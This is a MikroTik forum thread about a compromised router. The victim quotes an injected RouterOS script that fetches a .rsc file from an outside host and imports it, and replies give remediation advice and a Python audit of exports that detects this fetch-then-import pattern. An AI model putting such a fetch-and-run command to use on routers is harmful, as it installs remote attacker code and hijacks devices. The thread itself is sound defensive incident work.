dipsdips
just joined
Topic Author
Posts: 9
Joined: Mon May 10, 2021 11:31 pm

hacked script

Sun Jul 25, 2021 7:06 pm

Hi,

One of our routers was hacked and the following script was added:

/tool fetch url=http://zancetom.com/poll/8e39cd78-78ec- ... 94dc7ccbe8 mode=http dst-path=7wmp0b4s.rsc
/import 7wmp0b4s.rsc
No VLANs or VPNs were created, but my IP Socks was enabled and had 200 connections.

My firmware was 6.48.2 which I thought was not vulnerable to this hack.

Is there any way to find out what this was supposed to do?

Thanks.
Last edited by dipsdips on Sun Jul 25, 2021 8:05 pm, edited 1 time in total.
 
Cablenut9
Long time Member
Posts: 542
Joined: Fri Jan 08, 2021 5:30 am

Re: hacked script

Sun Jul 25, 2021 7:35 pm

Post the script content here and let's see what there is, because I don't want to go to that website to find out.
 
msatter
Forum Guru
Posts: 2897
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: hacked script

Sun Jul 25, 2021 8:13 pm

306 days ago: https://www.reddit.com/r/mikrotik/comme ... ded_to_my/
<html><head><meta http-equiv="refresh" content="0;url=http://searchguide.level3.com/search/?q=http://gamedate.xyz%2Fpoll%2F7c8c30a0-e932-4a1e-8f03-623d9c04df79&t=0&bc="/></head><body><script type="text/javascript">window.location="http://searchguide.level3.com/search/?q="+escape(window.location)+"&r="+escape(document.referrer)+"&t=0&bc=+"&r="+escape(document.referrer)+"&t=0&bc=)";</script></body></html>
179 days ago: https://www.reddit.com/r/mikrotik/comme ... ipt_in_my/
 
Jotne
Forum Guru
Posts: 3279
Joined: Sat Dec 24, 2016 11:17 am
Location: Magrathean

Re: hacked script

Mon Jul 26, 2021 8:18 am

There is only one solution to fix this, and that is Netinstall. https://wiki.mikrotik.com/wiki/Manual:Netinstall
Removing the config is not enough.
 
pe1chl
Forum Guru
Posts: 10183
Joined: Mon Jun 08, 2015 12:09 pm

Re: hacked script

Mon Jul 26, 2021 12:01 pm

And also:
- change the password
- make sure your router config interface (telnet, ssh, webfig, winbox, api) is NOT accessible from the internet (using the firewall).

The default firewall after a recent RouterOS install on "home routers" (not CCR, RB1100 etc) will be fine.
Note that updating RouterOS does not change the firewall, so when you had a very old install and merely updated it, you could still have a bad firewall.
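
An added example, not part of any post in this thread: a Python check over the text of a RouterOS `/export` for the two indicators reported in the first post (a scheduler or script entry that fetches a file and then imports it, and IP Socks enabled), plus the management services listed above that have neither `disabled=yes` nor an `address=` restriction. The sample export is constructed, the function names are hypothetical, and the check assumes that a service absent from the export is at its default (enabled, no address limit).

```python
import re

MGMT = ("telnet", "ssh", "www", "winbox", "api")  # www serves WebFig

# Constructed sample export, not taken from a real router; URL is a placeholder.
SAMPLE = r'''# constructed sample
/ip service
set telnet disabled=yes
set winbox address=192.168.88.0/24
/ip socks
set enabled=yes
/system scheduler
add interval=10m name=job1 on-event="/tool fetch url=http://example.invalid/\
    poll/PLACEHOLDER mode=http dst-path=a1.rsc\r\n/import a1.rsc"
'''

def logical_lines(export_text):
    """Yield (menu, command), joining the backslash-continued lines of an export."""
    menu, pending = "", ""
    for raw in export_text.splitlines():
        line = pending + raw.strip()
        if line.endswith("\\"):          # wrapped line: keep collecting
            pending = line[:-1]
            continue
        pending = ""
        if line.startswith("/") and "=" not in line:
            menu = line                  # menu header such as "/ip socks"
        elif line and not line.startswith("#"):
            yield menu, line

def audit(export_text):
    """Return a list of findings worth a manual look (assumed heuristics)."""
    findings, restricted = [], set()
    for menu, cmd in logical_lines(export_text):
        if menu == "/ip socks" and "enabled=yes" in cmd:
            findings.append("socks-enabled")
        if menu in ("/system scheduler", "/system script"):
            # Same pattern as the injected script: fetch to a file, then import it.
            m = re.search(r"/tool fetch\b.*?dst-path=([\w.-]+)", cmd)
            if m and re.search(r"/import\s+(file-name=)?" + re.escape(m.group(1)), cmd):
                name = re.search(r"(?:^|\s)name=(\S+)", cmd)
                findings.append("fetch-then-import:" + (name.group(1) if name else "?"))
        if menu == "/ip service":
            m = re.match(r"set (\S+) (.*)", cmd)
            if m and ("disabled=yes" in m.group(2) or "address=" in m.group(2)):
                restricted.add(m.group(1))
    findings += ["service-unrestricted:" + s for s in MGMT if s not in restricted]
    return findings
```

A `service-unrestricted` finding is a prompt to check the firewall input chain, since the `/ip service` section says nothing about firewall filtering.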
